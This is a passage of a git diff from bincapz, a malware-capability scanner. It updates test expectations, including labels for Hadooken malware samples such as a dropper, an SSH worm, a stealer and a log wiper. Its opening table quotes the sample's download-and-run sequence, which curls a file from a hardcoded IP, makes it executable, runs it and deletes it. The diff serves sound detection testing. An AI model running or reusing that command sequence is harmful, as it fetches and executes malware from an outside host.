[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) |
-| CRITICAL | [evasion/run_sleep_delete](https://github.com/chainguard-dev/bincapz/blob/main/rules/evasion/run_sleep_delete.yara#run_and_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) |
+| CRITICAL | [evasion/run_sleep_delete](https://github.com/chainguard-dev/bincapz/blob/main/rules/evasion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) |
| HIGH | [process/chdir/unusual](https://github.com/chainguard-dev/bincapz/blob/main/rules/process/chdir-unusual.yara#unusual_cd_val) | changes to an unusual system directory | [cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code) |
| HIGH | [ref/ip_port](https://github.com/chainguard-dev/bincapz/blob/main/rules/ref/ip_port.yara#hardcoded_ip_port) | hardcoded IP:port destination | [179.191.68.85:82](https://github.com/search?q=179.191.68.85%3A82&type=code) |
| HIGH | [ref/site/http/ip](https://github.com/chainguard-dev/bincapz/blob/main/rules/ref/site/http-ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Ex](http://179.191.68.85:82/vendor/sebastian/diff/src/Ex) |
diff --git a/test_data/linux/2024.hadooken/crondr_as_bash.sh.simple b/test_data/linux/2024.hadooken/crondr_as_bash.sh.simple
new file mode 100644
index 000000000..4d3b4d925
--- /dev/null
+++ b/test_data/linux/2024.hadooken/crondr_as_bash.sh.simple
@@ -0,0 +1,12 @@
+# linux/2024.hadooken/crondr_as_bash.sh
+crypto/mining/tls_dp_port
+evasion/copy_run_delete
+evasion/fake/process/name
+fs/file/copy
+fs/file/delete/forcibly
+process/chdir
+process/chdir/unusual
+ref/path/relative
+shell/exec
+shell/ignore_output
+shell/unusual_redirect
diff --git a/test_data/linux/2024.hadooken/drop1.sh.simple b/test_data/linux/2024.hadooken/drop1.sh.simple
new file mode 100644
index 000000000..508f2190e
--- /dev/null
+++ b/test_data/linux/2024.hadooken/drop1.sh.simple
@@ -0,0 +1,18 @@
+# linux/2024.hadooken/drop1.sh
+3P/threat_hunting/base64
+combo/dropper/shell
+data/embedded/base64/url
+encoding/base64
+evasion/base64/eval
+evasion/base64/external/decoder
+evasion/base64/python
+fs/file/delete
+fs/file/delete/forcibly
+net/download
+net/fetch
+ref/ip
+ref/path/tmp
+ref/site/http/ip
+ref/site/url
+shell/pipe_sh
+shell/tmp_semicolon
diff --git a/test_data/linux/2024.hadooken/drop2.sh.simple b/test_data/linux/2024.hadooken/drop2.sh.simple
new file mode 100644
index 000000000..73ae3ecb0
--- /dev/null
+++ b/test_data/linux/2024.hadooken/drop2.sh.simple
@@ -0,0 +1,9 @@
+# linux/2024.hadooken/drop2.sh
+combo/backdoor/remote_eval
+fd/read
+net/url
+net/url/request
+ref/ip
+ref/site/http/ip
+ref/site/url
+techniques/code_eval
diff --git a/test_data/linux/2024.hadooken/drop3.sh.simple b/test_data/linux/2024.hadooken/drop3.sh.simple
new file mode 100644
index 000000000..33d10800b
--- /dev/null
+++ b/test_data/linux/2024.hadooken/drop3.sh.simple
@@ -0,0 +1,6 @@
+# linux/2024.hadooken/drop3.sh
+evasion/run_sleep_delete
+fs/file/delete/forcibly
+ref/ip
+ref/site/http/ip
+ref/site/url
diff --git a/test_data/linux/2024.hadooken/figure4.py.simple b/test_data/linux/2024.hadooken/figure4.py.simple
new file mode 100644
index 000000000..b3ae81171
--- /dev/null
+++ b/test_data/linux/2024.hadooken/figure4.py.simple
@@ -0,0 +1,14 @@
+# linux/2024.hadooken/figure4.py
+combo/dropper/python
+exec/program
+fd/read
+fd/write
+fs/permission/modify
+net/download
+net/url
+net/url/request
+ref/ip
+ref/path/dev
+ref/path/var
+ref/site/http/ip
+ref/site/url
diff --git a/test_data/linux/2024.hadooken/ssh_worm.sh.simple b/test_data/linux/2024.hadooken/ssh_worm.sh.simple
new file mode 100644
index 000000000..8f8ae1d95
--- /dev/null
+++ b/test_data/linux/2024.hadooken/ssh_worm.sh.simple
@@ -0,0 +1,26 @@
+# linux/2024.hadooken/ssh_worm.sh
+3P/threat_hunting/base64
+combo/dropper/shell
+combo/stealer/linux_server
+combo/worm/ssh
+data/embedded/base64/url
+encoding/base64
+evasion/base64/eval
+evasion/base64/external/decoder
+evasion/base64/python
+fs/file/delete
+fs/file/delete/forcibly
+fs/file/times/set
+fs/permission/modify
+net/download
+net/fetch
+ref/path/hidden
+ref/path/home
+ref/path/root
+ref/path/tmp
+ref/site/http/ip
+ref/site/url
+secrets/bash_history
+secrets/ssh
+shell/pipe_sh
+shell/tmp_semicolon
diff --git a/test_data/linux/2024.hadooken/wipe_logs.sh.simple b/test_data/linux/2024.hadooken/wipe_logs.sh.simple
new file mode 100644
index 000000000..86b541fc5
--- /dev/null
+++ b/test_data/linux/2024.hadooken/wipe_logs.sh.simple
@@ -0,0 +1,5 @@
+# linux/2024.hadooken/wipe_logs.sh
+admin/logs/current_logins
+combo/wiper/sensitive_logs
+ref/path/var
+ref/path/var/log
diff --git a/test_data/linux/clean/caddy.simple b/test_data/linux/clean/caddy.simple
index 4eb3caf44..95cdae758 100644
--- a/test_data/linux/clean/caddy.simple
+++ b/test_data/linux/clean/caddy.simple
@@ -42,6 +42,7 @@ fs/directory/remove
fs/fifo/create
fs/file/capabilities/set
fs/file/delete
+fs/file/delete/forcibly
fs/file/read
fs/file/times/set
fs/file/write
diff --git a/test_data/linux/clean/chezmoi.simple b/test_data/linux/clean/chezmoi.simple
index f9ba03312..2a3061a70 100644
--- a/test_data/linux/clean/chezmoi.simple
+++ b/test_data/linux/clean/chezmoi.simple
@@ -50,6 +50,7 @@ fs/directory/list
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/read
fs/file/stat
fs/file/times/set
diff --git a/test_data/linux/clean/libsystemd.so.0.simple b/test_data/linux/clean/libsystemd.so.0.simple
index 08f205e73..0e8a038c4 100644
--- a/test_data/linux/clean/libsystemd.so.0.simple
+++ b/test_data/linux/clean/libsystemd.so.0.simple
@@ -3,6 +3,7 @@ env/TERM
env/USER
exec/program
fd/epoll
+fs/file/copy
fs/file/delete
fs/file/truncate
fs/link/read
diff --git a/test_data/linux/clean/minio.x86_64.simple b/test_data/linux/clean/minio.x86_64.simple
index 82969fe3c..91573822c 100644
--- a/test_data/linux/clean/minio.x86_64.simple
+++ b/test_data/linux/clean/minio.x86_64.simple
@@ -46,7 +46,9 @@ fs/directory/list
fs/directory/remove
fs/fifo/create
fs/file/capabilities/set
+fs/file/copy
fs/file/delete
+fs/file/delete/forcibly
fs/file/make_executable
fs/file/read
fs/file/times/set
diff --git a/test_data/linux/clean/mongosh.simple b/test_data/linux/clean/mongosh.simple
index ef8c9e1de..e6dfa6c47 100644
--- a/test_data/linux/clean/mongosh.simple
+++ b/test_data/linux/clean/mongosh.simple
@@ -49,6 +49,7 @@ fs/directory/create
fs/directory/list
fs/directory/remove
fs/file/capabilities/set
+fs/file/copy
fs/file/delete
fs/file/delete/forcibly
fs/file/read
diff --git a/test_data/linux/clean/opa.simple b/test_data/linux/clean/opa.simple
index 8be285a32..d8d8b44f9 100644
--- a/test_data/linux/clean/opa.simple
+++ b/test_data/linux/clean/opa.simple
@@ -22,6 +22,7 @@ exec/cmd
exec/program
fs/directory/list
fs/directory/remove
+fs/file/copy
fs/file/delete
fs/file/read
fs/file/stat
diff --git a/test_data/linux/clean/sonarlint-metadata.json.simple b/test_data/linux/clean/sonarlint-metadata.json.simple
index 39ba7c491..81578476a 100644
--- a/test_data/linux/clean/sonarlint-metadata.json.simple
+++ b/test_data/linux/clean/sonarlint-metadata.json.simple
@@ -10,6 +10,8 @@ encoding/json/encode
env/get
fd/read
fd/write
+fs/file/copy
+fs/file/delete/forcibly
fs/file/read
fs/file/write
fs/permission/modify
diff --git a/test_data/linux/synthetic/github-attach-fetch.sh.simple b/test_data/linux/synthetic/github-attach-fetch.sh.simple
index 1f84c282f..ef441705e 100644
--- a/test_data/linux/synthetic/github-attach-fetch.sh.simple
+++ b/test_data/linux/synthetic/github-attach-fetch.sh.simple
@@ -1,8 +1,10 @@
# linux/synthetic/github-attach-fetch.sh
+combo/dropper/shell
fs/permission/modify
net/fetch
-ref/site/github_comment_attachment
+ref/site/github_attachment
ref/site/url
ref/words/backdoor
shell/background_launcher
shell/exec
+shell/nohup
diff --git a/test_data/php/clean/composer-2.7.7.simple b/test_data/php/clean/composer-2.7.7.simple
index 38fa8c0d4..db14c841a 100644
--- a/test_data/php/clean/composer-2.7.7.simple
+++ b/test_data/php/clean/composer-2.7.7.simple
@@ -25,6 +25,7 @@ exec/cmd
exec/shell_command
fs/directory/create
fs/directory/remove
+fs/file/copy
fs/file/delete
fs/file/delete/forcibly
fs/file/times/set
diff --git a/test_data/php/clean/run-tests.php.simple b/test_data/php/clean/run-tests.php.simple
index f853119e3..1aeda091a 100644
--- a/test_data/php/clean/run-tests.php.simple
+++ b/test_data/php/clean/run-tests.php.simple
@@ -10,6 +10,7 @@ fs/directory/create
fs/file/delete
fs/permission/modify
fs/symlink/resolve
+fs/tempdir
kernel/platform
net/http/cookies
net/http/form/upload
diff --git a/test_data/windows/2024.GitHub.Clipper/main.exe.simple b/test_data/windows/2024.GitHub.Clipper/main.exe.simple
index d55d4bae0..e94a3d4a5 100644
--- a/test_data/windows/2024.GitHub.Clipper/main.exe.simple
+++ b/test_data/windows/2024.GitHub.Clipper/main.exe.simple
@@ -36,6 +36,7 @@ fs/file/read
fs/file/write
fs/permission/chown
fs/permission/modify
+fs/tempdir
hash/md5
kernel/cpu/info
malware/family/skuld